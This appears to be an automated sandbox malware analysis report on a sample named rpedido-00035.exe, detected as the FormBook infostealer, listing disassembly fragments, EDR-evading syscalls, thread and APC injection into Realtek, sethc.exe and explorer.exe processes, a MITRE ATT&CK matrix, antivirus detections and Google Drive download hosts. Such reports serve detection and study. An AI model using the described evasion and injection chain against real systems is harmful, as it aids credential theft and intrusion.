            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601A2E0 mov eax, dword ptr fs:[00000030h]2_2_3601A2E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601A2E0 mov eax, dword ptr fs:[00000030h]2_2_3601A2E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601A2E0 mov eax, dword ptr fs:[00000030h]2_2_3601A2E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360182E0 mov eax, dword ptr fs:[00000030h]2_2_360182E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360182E0 mov eax, dword ptr fs:[00000030h]2_2_360182E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360182E0 mov eax, dword ptr fs:[00000030h]2_2_360182E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360182E0 mov eax, dword ptr fs:[00000030h]2_2_360182E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D2EC mov eax, dword ptr fs:[00000030h]2_2_3600D2EC
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D2EC mov eax, dword ptr fs:[00000030h]2_2_3600D2EC
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360202F9 mov eax, dword ptr fs:[00000030h]2_2_360202F9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36009303 mov eax, dword ptr fs:[00000030h]2_2_36009303
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36009303 mov eax, dword ptr fs:[00000030h]2_2_36009303
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3609330C mov eax, dword ptr fs:[00000030h]2_2_3609330C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3609330C mov eax, dword ptr fs:[00000030h]2_2_3609330C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3609330C mov eax, dword ptr fs:[00000030h]2_2_3609330C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3609330C mov eax, dword ptr fs:[00000030h]2_2_3609330C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF30A mov eax, dword ptr fs:[00000030h]2_2_360CF30A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602E310 mov eax, dword ptr fs:[00000030h]2_2_3602E310
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602E310 mov eax, dword ptr fs:[00000030h]2_2_3602E310
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602E310 mov eax, dword ptr fs:[00000030h]2_2_3602E310
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604631F mov eax, dword ptr fs:[00000030h]2_2_3604631F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36048322 mov eax, dword ptr fs:[00000030h]2_2_36048322
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36048322 mov eax, dword ptr fs:[00000030h]2_2_36048322
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36048322 mov eax, dword ptr fs:[00000030h]2_2_36048322
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E328 mov eax, dword ptr fs:[00000030h]2_2_3600E328
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E328 mov eax, dword ptr fs:[00000030h]2_2_3600E328
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E328 mov eax, dword ptr fs:[00000030h]2_2_3600E328
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603332D mov eax, dword ptr fs:[00000030h]2_2_3603332D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E3336 mov eax, dword ptr fs:[00000030h]2_2_360E3336
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36008347 mov eax, dword ptr fs:[00000030h]2_2_36008347
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36008347 mov eax, dword ptr fs:[00000030h]2_2_36008347
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36008347 mov eax, dword ptr fs:[00000030h]2_2_36008347
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604A350 mov eax, dword ptr fs:[00000030h]2_2_3604A350
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36090371 mov eax, dword ptr fs:[00000030h]2_2_36090371
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36090371 mov eax, dword ptr fs:[00000030h]2_2_36090371
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603237A mov eax, dword ptr fs:[00000030h]2_2_3603237A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF38A mov eax, dword ptr fs:[00000030h]2_2_360CF38A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603A390 mov eax, dword ptr fs:[00000030h]2_2_3603A390
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603A390 mov eax, dword ptr fs:[00000030h]2_2_3603A390
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603A390 mov eax, dword ptr fs:[00000030h]2_2_3603A390
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360193A6 mov eax, dword ptr fs:[00000030h]2_2_360193A6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360193A6 mov eax, dword ptr fs:[00000030h]2_2_360193A6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608C3B0 mov eax, dword ptr fs:[00000030h]2_2_3608C3B0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E3C0 mov eax, dword ptr fs:[00000030h]2_2_3600E3C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E3C0 mov eax, dword ptr fs:[00000030h]2_2_3600E3C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600E3C0 mov eax, dword ptr fs:[00000030h]2_2_3600E3C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600C3C7 mov eax, dword ptr fs:[00000030h]2_2_3600C3C7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360163CB mov eax, dword ptr fs:[00000030h]2_2_360163CB
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360433D0 mov eax, dword ptr fs:[00000030h]2_2_360433D0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360443D0 mov ecx, dword ptr fs:[00000030h]2_2_360443D0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360943D5 mov eax, dword ptr fs:[00000030h]2_2_360943D5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36035004 mov eax, dword ptr fs:[00000030h]2_2_36035004
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36035004 mov ecx, dword ptr fs:[00000030h]2_2_36035004
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36018009 mov eax, dword ptr fs:[00000030h]2_2_36018009
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052010 mov ecx, dword ptr fs:[00000030h]2_2_36052010
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D02D mov eax, dword ptr fs:[00000030h]2_2_3600D02D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36040044 mov eax, dword ptr fs:[00000030h]2_2_36040044
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011051 mov eax, dword ptr fs:[00000030h]2_2_36011051
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011051 mov eax, dword ptr fs:[00000030h]2_2_36011051
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E505B mov eax, dword ptr fs:[00000030h]2_2_360E505B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360B9060 mov eax, dword ptr fs:[00000030h]2_2_360B9060
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36017072 mov eax, dword ptr fs:[00000030h]2_2_36017072
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36016074 mov eax, dword ptr fs:[00000030h]2_2_36016074
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36016074 mov eax, dword ptr fs:[00000030h]2_2_36016074
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]2_2_360E4080
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600C090 mov eax, dword ptr fs:[00000030h]2_2_3600C090
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600A093 mov ecx, dword ptr fs:[00000030h]2_2_3600A093
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360500A5 mov eax, dword ptr fs:[00000030h]2_2_360500A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CB0AF mov eax, dword ptr fs:[00000030h]2_2_360CB0AF
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]2_2_360BF0A5
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E50B7 mov eax, dword ptr fs:[00000030h]2_2_360E50B7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602B0D0 mov eax, dword ptr fs:[00000030h]2_2_3602B0D0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B0D6 mov eax, dword ptr fs:[00000030h]2_2_3600B0D6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B0D6 mov eax, dword ptr fs:[00000030h]2_2_3600B0D6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B0D6 mov eax, dword ptr fs:[00000030h]2_2_3600B0D6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B0D6 mov eax, dword ptr fs:[00000030h]2_2_3600B0D6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604D0F0 mov eax, dword ptr fs:[00000030h]2_2_3604D0F0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3604D0F0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600C0F6 mov eax, dword ptr fs:[00000030h]2_2_3600C0F6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360090F8 mov eax, dword ptr fs:[00000030h]2_2_360090F8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360090F8 mov eax, dword ptr fs:[00000030h]2_2_360090F8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360090F8 mov eax, dword ptr fs:[00000030h]2_2_360090F8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360090F8 mov eax, dword ptr fs:[00000030h]2_2_360090F8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603510F mov eax, dword ptr fs:[00000030h]2_2_3603510F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603510F mov eax, dword ptr fs:[00000030h]2_2_3603510F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603510F mov eax, dword ptr fs:[00000030h]2_2_3603510F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A5187EJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A49C67Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x6A49CDEJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeNtSetContextThread: Indirect: 0x133829Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeNtQueueApcThread: Indirect: 0x12F5AEJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFB057C2651Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFAD4979E7F
            Source: C:\Users\user\Desktop\rpedido-00035.exeNtSuspendThread: Indirect: 0x133B49Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A49AA1Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeNtResumeThread: Indirect: 0x133E69Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: NULL target: C:\Windows\SysWOW64\sethc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\rpedido-00035.exeThread register set: target process: 4296Jump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeThread register set: target process: 4296Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\rpedido-00035.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		OS Credential Dumping121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
            Process Injection            		2
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets3
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526071 Sample: rpedido-00035.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 2 other signatures 2->48 10 rpedido-00035.exe 1 30 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\Meningorrhoea.Tig, data 10->26 dropped 28 C:\Users\user\AppData\Local\...\nszDD94.tmp, data 10->28 dropped 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 56 Switches to a custom stack to bypass stack traces 10->56 14 rpedido-00035.exe 6 10->14         started        signatures6 process7 dnsIp8 36 drive.usercontent.google.com 142.250.65.161, 443, 49776 GOOGLEUS United States 14->36 38 drive.google.com 142.250.65.206, 443, 49775 GOOGLEUS United States 14->38 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Queues an APC in another process (thread injection) 14->62 64 Found direct / indirect Syscall (likely to bypass EDR) 14->64 18 RAVCpl64.exe 14->18 injected signatures9 process10 signatures11 40 Found direct / indirect Syscall (likely to bypass EDR) 18->40 21 sethc.exe 18->21         started        process12 signatures13 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Switches to a custom stack to bypass stack traces 21->54 24 explorer.exe 54 1 21->24 injected process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rpedido-00035.exe100%AviraHEUR/AGEN.1331786
            rpedido-00035.exe18%ReversingLabsWin32.Trojan.InjectorX

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.65.206
            		truefalse
              		unknown
              drive.usercontent.google.com
              		142.250.65.161
              		truefalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdrpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                  		unknown
                  https://www.google.comrpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.quovadis.bm0rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://drive.usercontent.google.com/rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
